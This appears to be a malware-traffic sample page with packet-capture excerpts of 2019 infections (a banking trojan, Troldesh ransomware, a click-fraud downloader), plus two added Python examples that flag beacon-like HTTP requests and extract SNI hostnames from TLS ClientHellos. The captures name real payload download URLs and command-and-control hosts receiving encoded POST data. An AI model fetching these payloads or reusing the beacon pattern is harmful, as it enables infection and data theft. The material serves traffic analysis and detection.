Text Example

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT
If-Range: "10d200-58a0f88c11a17"
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>

2019-05-29 21:16:37.647544 IP 77.222.57.253.80 > 10.1.10.162.60447: Flags [P.], seq 42341:43801, ack 281, win 237, length 1460: HTTP
[binary response payload omitted]

2019-05-29 21:16:45.383337 IP 10.1.10.162.60448 > 77.222.57.253.80: Flags [P.], seq 4169006147:4169006321, ack 1258956205, win 16425, length 174: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 43590
Cache-Control: no-cache

POST /prosper/index.php evaglobal.eu prosper.exe Malware PCAP file download Traffic Sample

2019-05-30 00:41:38.457600 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1430869096:1430869520, ack 1051603559, win 16425, length 424: HTTP: GET /prosper.exe HTTP/1.1
GET /prosper.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-30 00:42:14.087418 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 3640301184:3640301460, ack 3223405560, win 64240, length 276: HTTP: POST /prosper/index.php HTTP/1.1
POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 109
Cache-Control: no-cache

J/.4/.=I.>:.>;.L/.I/.5/.>/.9/.>K.>8.N/.I/.;/./.?L.>>.><.>?.?N.(9.N/.8/.5/.4L.>3.?N.>>.>=.>2.(9.(9.(9.K/.>
2019-05-30 00:42:15.211255 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 7301:8379, ack 276, win 30016, length 1078: HTTP
[binary response payload omitted]
2019-05-30 00:42:17.098581 IP 149.56.22.192.80 > 10.1.10.162.49186: Flags [P.], seq 4477439:4478073, ack 276, win 30016, length 634: HTTP
[binary response payload omitted]

2019-05-30 00:42:21.556290 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 276:445, ack 4478073, win 64240, length 169: HTTP: POST /prosper/index.php HTTP/1.1
POST /prosper/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: evaglobal.eu
Content-Length: 44579
Cache-Control: no-cache

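Both captures above follow the same shape: a download request carrying the full IE8 browser header set (Accept, Accept-Language, Accept-Encoding), then short POSTs to /index.php from the same host with a different and older User-Agent string (MSIE 6.0b / Windows NT 5.1), no Accept or Content-Type header, Cache-Control: no-cache, a 109-byte body first and then roughly 44 KB. The following Python is an added triage example written for this page, not code from the original capture set. It pulls the readable request headers out of tcpdump -A text (the embedded sample is constructed from the headers of the first capture, with the IP header bytes removed) and flags requests on those three observables. The heuristics are assumptions about what deserves a second look, not signatures for a named family.

```python
import re
from collections import defaultdict

# Constructed sample: the readable request headers of the t-trade.net /
# n500stoker.temp.swtest.ru capture above, with the IP header bytes that
# tcpdump -A prints before each request line removed.
SAMPLE = """\
2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1
GET /sim.o HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=240615-
Host: t-trade.net
Connection: Keep-Alive

2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 109
Cache-Control: no-cache

2019-05-29 21:16:45.383337 IP 10.1.10.162.60448 > 77.222.57.253.80: Flags [P.], seq 4169006147:4169006321, ack 1258956205, win 16425, length 174: HTTP: POST /index.php HTTP/1.1
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: n500stoker.temp.swtest.ru
Content-Length: 43590
Cache-Control: no-cache
"""

# tcpdump packet summary line that ends in an HTTP request line.
SUMMARY_RE = re.compile(
    r"^(?P<ts>\S+ \S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): .*HTTP: "
    r"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/1\.[01]\s*$"
)


def parse_requests(text):
    """Return one dict per HTTP request in tcpdump -A style text.

    Each dict holds the summary-line fields plus a lower-cased header map.
    Header collection stops at the first blank line or the next packet
    summary, so body bytes and binary noise after the headers are ignored.
    """
    requests, current = [], None
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            current = dict(m.groupdict(), headers={})
            requests.append(current)
            continue
        if current is None:
            continue
        if not line.strip():
            current = None                       # end of this header block
            continue
        if current["method"] + " " + current["uri"] in line:
            continue                             # request line repeated by -A
        name, sep, value = line.partition(":")
        if sep and " " not in name.strip():
            current["headers"][name.strip().lower()] = value.strip()
    return requests


def flag_beacons(requests):
    """Flag requests on three observables from the captures above.

    1. User-Agent differs from the one(s) the same client used on
       browser-shaped requests (those carrying an Accept header).
    2. POST without a Content-Type header (browser form and XHR posts set one).
    3. GET with a Range header, i.e. a resumed download of the payload.
    These are triage heuristics assumed for this example, not family signatures.
    """
    browser_ua = defaultdict(set)
    for r in requests:
        h = r["headers"]
        if "accept" in h and "user-agent" in h:
            browser_ua[r["src"]].add(h["user-agent"])

    flagged = []
    for r in requests:
        h, reasons = r["headers"], []
        ua = h.get("user-agent")
        if ua and browser_ua[r["src"]] and ua not in browser_ua[r["src"]]:
            reasons.append("user-agent differs from browser UA")
        if r["method"] == "POST" and "content-type" not in h:
            reasons.append("POST without Content-Type")
        if r["method"] == "GET" and "range" in h:
            reasons.append("ranged download (Range: %s)" % h["range"])
        if reasons:
            flagged.append(dict(r, reasons=reasons))
    return flagged


if __name__ == "__main__":
    for r in flag_beacons(parse_requests(SAMPLE)):
        print(r["ts"], r["method"], r["headers"].get("host"), r["uri"],
              "->", "; ".join(r["reasons"]))
```

Point it at the full text dump of a capture rather than the constructed sample and every request from the victim host is scored the same way; the Accept-based notion of "browser UA" is what separates the real IE8 fetches from the bare MSIE 6.0b POSTs without hard-coding either string.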
copticorphans.org Ransomware Malware PCAP file download Traffic Sample

https://www.virustotal.com/fr/file/c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10/analysis/
SHA256: c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10

File name: 1c.jpg
Detection ratio: 32 / 72
Analysis date: 2019-05-29 14:27:51 UTC (16 hours, 28 minutes ago)

2019-05-29 21:44:21.090952 IP 10.1.10.162.49185 > 93.191.156.122.80: Flags [P.], seq 2960318675:2960319109, ack 288044427, win 16425, length 434: HTTP: GET /blogs/media/1c.jpg HTTP/1.1
GET /blogs/media/1c.jpg HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: vision4cph.com
Connection: Keep-Alive

2019-05-29 21:44:21.204625 IP 93.191.156.122.80 > 10.1.10.162.49185: Flags [P.], seq 1461:2413, ack 434, win 123, length 952: HTTP
[HTML body of the UnoEuro placeholder page returned in place of 1c.jpg; visible text:]
The site you are trying to reach could be suspended, deleted or DNS could be incorrect
This domain is hosted by UnoEuro

2019-05-29 21:44:21.565707 IP 10.1.10.162.49187 > 94.231.106.23.80: Flags [P.], seq 500259223:500259593, ack 2801741812, win 16425, length 370: HTTP: GET /splash.css HTTP/1.1
GET /splash.css HTTP/1.1
Accept: */*
Referer: http://vision4cph.com/blogs/media/1c.jpg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: splash.unoeuro.com
Connection: Keep-Alive

2019-05-29 21:44:21.566770 IP 10.1.10.162.49186 > 94.231.106.23.80: Flags [P.], seq 422854994:422855366, ack 3696602173, win 16425, length 372: HTTP: GET /hostedby.png HTTP/1.1
GET /hostedby.png HTTP/1.1
Accept: */*
Referer: http://vision4cph.com/blogs/media/1c.jpg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: splash.unoeuro.com
Connection: Keep-Alive

2019-05-29 21:45:48.303893 IP 10.1.10.162.49197 > 67.205.132.158.443: Flags [P.], seq 730561231:730561361, ack 3595014057, win 16425, length 130
[TLS ClientHello; SNI: copticorphans.org]
2019-05-29 21:45:48.331867 IP 67.205.132.158.443 > 10.1.10.162.49197: Flags [P.], seq 2921:3577, ack 130, win 237, length 656
[binary TLS handshake data omitted; ASN.1 timestamps 20190529060000Z / 20190605060000Z visible in the bytes]
2019-05-29 21:45:48.342006 IP 10.1.10.162.49197 > 67.205.132.158.443: Flags [P.], seq 130:264, ack 3577, win 16425, length 134
[binary TLS handshake data omitted]
2019-05-29 21:45:48.360582 IP 67.205.132.158.443 > 10.1.10.162.49197: Flags [P.], seq 3577:3636, ack 264, win 245, length 59
[binary TLS record omitted]
2019-05-29 21:45:48.384865 IP 10.1.10.162.49197 > 67.205.132.158.443: Flags [P.], seq 264:589, ack 3636, win 16410, length 325
[binary TLS record omitted]

TROLDESH Ransomware PCAP Download Traffic Sample undergroundlabsuk.com 185.119.174.45

URLhaus Database

URLhaus tries to identify the malware associated with the payload served by a certain malware URL. In case URLhaus is able to identify the associated malware family, the payload will be tagged accordingly (field signature). The page below gives you an overview on payloads that URLhaus has identified as Ransomware.Troldesh.

2019-05-29 21:53:52.091291 IP 10.1.10.162.49184 > 185.119.174.45.80: Flags [P.], seq 1195198762:1195199227, ack 4032472939, win 16425, length 465: HTTP: GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: undergroundlabsuk.com
Connection: Keep-Alive

2019-05-29 21:53:55.597305 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
Date: Thu, 30 May 2019 01:53:52 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: https://undergroundlabsuk.com/wp-content/themes/Divi/et-pagebuilder/1c.j
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-29 21:53:55.891821 IP 185.119.174.45.80 > 10.1.10.162.49184: Flags [P.], seq 1:406, ack 465, win 123, length 405: HTTP: HTTP/1.1 301 Moved Permanently
[TCP retransmission of the 301 above: same seq 1:406 / ack 465, identical headers]

2019-05-29 21:53:55.902075 IP 10.1.10.162.49185 > 185.119.174.45.443: Flags [P.], seq 3137670173:3137670307, ack 1653186217, win 16425, length 134
[TLS ClientHello, binary omitted]
2019-05-29 21:54:12.260958 IP 10.1.10.162.49192 > 185.119.174.45.443: Flags [P.], seq 2305352218:2305352384, ack 1046836851, win 16425, length 166
[TLS ClientHello; SNI: undergroundlabsuk.com]
2019-05-29 21:54:12.261557 IP 10.1.10.162.49191 > 185.119.174.45.443: Flags [P.], seq 3481323599:3481323765, ack 128666795, win 16425, length 166
[TLS ClientHello; SNI: undergroundlabsuk.com]
2019-05-29 21:54:12.263148 IP 10.1.10.162.49194 > 185.119.174.45.443: Flags [P.], seq 1173719525:1173719691, ack 3012160489, win 16425, length 166
[TLS ClientHello; SNI: undergroundlabsuk.com]
2019-05-29 21:54:12.271973 IP 10.1.10.162.49193 > 185.119.174.45.443: Flags [P.], seq 1172014663:1172014829, ack 773836195, win 16425, length 166
[TLS ClientHello; SNI: undergroundlabsuk.com]
2019-05-29 21:54:12.313725 IP 185.119.174.45.443 > 10.1.10.162.49185: Flags [P.], seq 37350:38810, ack 769, win 140, length 1460
[binary TLS application data omitted]
2019-05-29 21:54:12.357676 IP 185.119.174.45.443 > 10.1.10.162.49194: Flags [P.], seq 1:146, ack 166, win 123, length 145
[binary TLS handshake data omitted]
2019-05-29 21:54:12.358112 IP 10.1.10.162.49194 > 185.119.174.45.443: Flags [P.], seq 166:225, ack 146, win 16388, length 59
[binary TLS record omitted]
2019-05-29 21:54:12.361324 IP 185.119.174.45.443 > 10.1.10.162.49192: Flags [P.], seq 1:146, ack 166, win 123, length 145
[binary TLS handshake data omitted]
2019-05-29 21:54:12.892573 IP 10.1.10.162.49203 > 185.119.174.45.443: Flags [P.], seq 3572732553:3572732719, ack 4054164407, win 16425, length 166
[TLS ClientHello; SNI: undergroundlabsuk.com]
2019-05-29 21:54:12.954592 IP 10.1.10.162.49204 > 185.119.174.45.443: Flags [P.], seq 3200671630:3200671796, ack 2230721411, win 16425, length 166
[binary omitted; the capture listing is truncated here and resumes with the OCSP response below]

2019-05-29 21:55:35.085480 IP 204.237.142.208.80 > 10.1.10.162.49293: Flags [P.], seq 1:914, ack 255, win 237, length 913: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 527
ETag: "C911F69DFEADAC3CC6E8285B7E18A61BF26D22F5E74E9A35FE21376765EAA26A"
Last-Modified: Wed, 29 May 2019 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43194
Expires: Thu, 30 May 2019 13:55:28 GMT
Date: Thu, 30 May 2019 01:55:34 GMT
Connection: keep-alive

[DER-encoded OCSP response, 527 bytes, naming Let's Encrypt Authority X3 with timestamps 20190529221100Z, 20190529220000Z and 20190605220000Z; binary omitted]
2019-05-29 21:55:52.309807 IP 10.1.10.162.49294 > 185.55.224.150.80: Flags [P.], seq 763839603:763839890, ack 2187406094, win 16425, length 287: HTTP: GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: westap.ir
Connection: Keep-Alive

@getBootstrapCDN TWITTER Malware Trojan Downloader Click Fraud PCAP File Download Traffic Sample batdongsantaynambo.com.vn

2019-05-29 22:03:15.716964 IP 10.1.10.162.49185 > 103.221.223.17.80: Flags [P.], seq 319437355:319437820, ack 122938386, win 16425, length 465: HTTP: GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:16.670058 IP 103.221.223.17.80 > 10.1.10.162.49185: Flags [P.], seq 7301:8643, ack 465, win 22, length 1342: HTTP
[binary response payload omitted]
2019-05-29 22:03:16.765568 IP 10.1.10.162.49197 > 204.237.142.161.80: Flags [P.], seq 3885137682:3885138158, ack 3673702138, win 16425, length 476: HTTP: GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: w.sharethis.com
Connection: Keep-Alive

2019-05-29 22:03:16.791424 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 4828:5890, ack 449, win 60, length 1062: HTTP
[gzip-compressed response body, binary omitted]
2019-05-29 22:03:16.793379 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 1:448, ack 449, win 60, length 447: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 30 May 2019 02:03:16 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1544639719"
Content-Encoding: gzip
Content-Length: 5442
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 12 Dec 2018 18:35:19 GMT
X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter

2019-05-29 22:03:17.300171 IP 10.1.10.162.49186 > 103.221.223.17.80: Flags [P.], seq 456:903, ack 5552, win 16425, length 447: HTTP: GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:17.305502 IP 10.1.10.162.49196 > 209.197.3.15.80: Flags [P.], seq 449:894, ack 5890, win 16425, length 445: HTTP: GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: maxcdn.bootstrapcdn.com
Connection: Keep-Alive

2019-05-29 22:03:20.996939 IP 10.1.10.162.49227 > 103.221.223.17.443: Flags [P.], seq 469823780:469823918, ack 3162838577, win 16425, length 138
[TLS ClientHello; SNI: batdongsantaynambo.com.vn]
2019-05-29 22:03:21.000153 IP 10.1.10.162.49226 > 103.221.223.17.443: Flags [P.], seq 1306475388:1306475526, ack 1356580027, win 16425, length 138
[TLS ClientHello; SNI: batdongsantaynambo.com.vn]
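The ClientHello records on this page are the only place the TLS flows expose a hostname in the clear: the SNI extension, which is where copticorphans.org, undergroundlabsuk.com and batdongsantaynambo.com.vn appear in the captured bytes above. The following Python is an added example for this page, not code from the original capture set. build_client_hello constructs a minimal TLS 1.2 ClientHello as test input (the real records are the binary segments shown above; the random value and the single cipher suite are placeholders), and extract_sni walks the record with bounds checks and returns the host_name, or None for anything that is not a complete ClientHello carrying SNI. It assumes the caller has already reassembled the TCP segment(s) carrying the whole handshake message.

```python
import struct

SNI_EXTENSION = 0x0000   # extension type server_name
HOST_NAME_TYPE = 0x00    # NameType host_name


def build_client_hello(host, random_bytes=b"\x11" * 32):
    """Construct a minimal TLS 1.2 ClientHello record with an SNI extension.

    Constructed test input only: the random value and the single cipher
    suite (0xc02f) are placeholders, not values from the captures.
    """
    name = host.encode("ascii")
    entry = bytes([HOST_NAME_TYPE]) + struct.pack("!H", len(name)) + name
    name_list = struct.pack("!H", len(entry)) + entry
    sni_ext = struct.pack("!HH", SNI_EXTENSION, len(name_list)) + name_list
    body = (
        b"\x03\x03"                              # client_version: TLS 1.2
        + random_bytes                           # 32-byte random
        + b"\x00"                                # session_id: empty
        + struct.pack("!H", 2) + b"\xc0\x2f"     # cipher_suites: one entry
        + b"\x01\x00"                            # compression_methods: null
        + struct.pack("!H", len(sni_ext)) + sni_ext
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # ClientHello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record):
    """Return the SNI host_name of a TLS ClientHello record, or None.

    None covers non-handshake records, non-ClientHello messages, truncated
    data and ClientHellos without SNI. Every length field is bounds-checked
    so a cut-off capture fails closed instead of raising. A ClientHello can
    straddle TCP segments, so pass a reassembled record.
    """
    if len(record) < 5 or record[0] != 0x16:
        return None
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        return None
    hs_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + hs_len]
    if len(body) < hs_len or len(body) < 34:
        return None
    pos = 34                                     # past version + random

    def take(n):
        nonlocal pos
        chunk = body[pos:pos + n]
        if len(chunk) < n:
            raise ValueError("truncated ClientHello")
        pos += n
        return chunk

    try:
        take(take(1)[0])                         # session_id
        take(struct.unpack("!H", take(2))[0])    # cipher_suites
        take(take(1)[0])                         # compression_methods
        if pos == len(body):
            return None                          # no extensions block
        end = pos + struct.unpack("!H", take(2))[0]
        while pos + 4 <= end:
            ext_type, ext_len = struct.unpack("!HH", take(4))
            data = take(ext_len)
            if ext_type != SNI_EXTENSION or len(data) < 2:
                continue
            limit = min(2 + struct.unpack("!H", data[:2])[0], len(data))
            p = 2
            while p + 3 <= limit:
                name_type = data[p]
                name_len = struct.unpack("!H", data[p + 1:p + 3])[0]
                name = data[p + 3:p + 3 + name_len]
                p += 3 + name_len
                if name_type == HOST_NAME_TYPE and len(name) == name_len:
                    return name.decode("ascii", "replace")
    except ValueError:
        return None
    return None


if __name__ == "__main__":
    for host in ("copticorphans.org", "undergroundlabsuk.com",
                 "batdongsantaynambo.com.vn"):
        print(host, "->", extract_sni(build_client_hello(host)))
```

Feed extract_sni the first client-to-server record of each port 443 flow and you get the same hostnames tcpdump shows in the dotted bytes, without relying on string search over binary output; a record that is not a ClientHello (application data, a retransmitted fragment) yields None rather than a false hit.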
2019-05-29 22:03:21.267277 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 1456137481:1456137622, ack 2445346460, win 16425, length 141
[TLS ClientHello; SNI: c.sharethis.mgr.consensu.org]
2019-05-29 22:03:21.286768 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 2921:3746, ack 141, win 237, length 825
[binary TLS handshake data omitted; ASN.1 timestamps 20190529032056Z / 20190605023556Z visible in the bytes]
2019-05-29 22:03:21.305611 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 141:275, ack 3746, win 16425, length 134
[binary TLS handshake data omitted]
2019-05-29 22:03:21.321761 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 3746:3805, ack 275, win 245, length 59
[binary TLS record omitted]
2019-05-29 22:03:21.329715 IP 103.221.223.17.443 > 10.1.10.162.49225: Flags [P.], seq 8:430, ack 138, win 22, length 422
[HTML body of the LiteSpeed error page; visible text:]
400 Bad Request
HTTPS is required
This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.
Hint: The URL should starts with https://
Powered By LiteSpeed Web Server
http://www.litespeedtech.com

2019-05-29 22:04:14.347717 IP 10.1.10.162.49279 > 198.27.80.143.80: Flags [P.], seq 2027903908:2027904329, ack 3692538470, win 16425, length 421: HTTP: GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
Accept: */*
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: s4.histats.com
Connection: Keep-Alive